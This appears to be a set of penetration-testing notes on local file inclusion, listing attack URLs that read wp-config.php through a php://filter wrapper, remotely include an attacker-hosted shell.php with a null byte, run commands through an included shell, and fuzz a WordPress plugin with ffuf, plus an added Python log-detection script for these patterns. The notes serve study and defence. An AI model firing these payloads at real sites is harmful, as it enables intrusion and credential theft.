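PHP filter wrapper for reading the source of .php files (the file is base64-encoded before it is included, so its source is returned instead of being executed)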
php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
Example:
<http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php>
Null byte injection to cut off an extension that the application appends to the included path
10.11.1.8/?ACS_path=http://192.168.119.122/Utilities/Revshells/shell.php%00
LFI can be used to trigger RCE by including a file that was planted through another route
<http://10.11.1.113/alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id>
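Detection side of the three request shapes above, as an added example that is not part of the original notes: a Python check that pulls query parameter values out of access-log lines and flags stream wrappers, remote includes, null bytes and directory traversal. The log lines, the client and host addresses and the rule names are constructed for the example, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators modelled on the request shapes listed in these notes.
RULES = [
    ("stream_wrapper", re.compile(r"^(php|data|expect|zip|phar|file)://", re.I)),
    ("remote_include", re.compile(r"^(https?|ftp)://", re.I)),
    ("null_byte", re.compile(r"\x00")),
    ("path_traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
]
# Assumed combined log format: the request line is the first quoted field.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php HTTP/1.1" 200 4312',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?ACS_path=http://192.0.2.10/shell.php%00 HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id HTTP/1.1" 200 88',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /nav.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1500',
    '203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /nav.php?page=about HTTP/1.1" 200 2048',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .), with a bound."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the sorted rule names matched by any query parameter value."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    hits = set()
    # parse_qsl decodes once; fully_decode handles double encoding.
    for _name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(raw)
        hits.update(name for name, rx in RULES if rx.search(value))
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

The remote_include rule matches any parameter that starts with a URL, so in practice it should be limited to parameters that reach an include or file-read call.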
Files to look for on Windows
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
Files to look for on Linux
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
LFI Fuzzing
ffuf -u 'http://machine.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=FUZZ' -w file_inclusion_linux.txt -fs 0-1000
LFI to RCE: Log Poisoning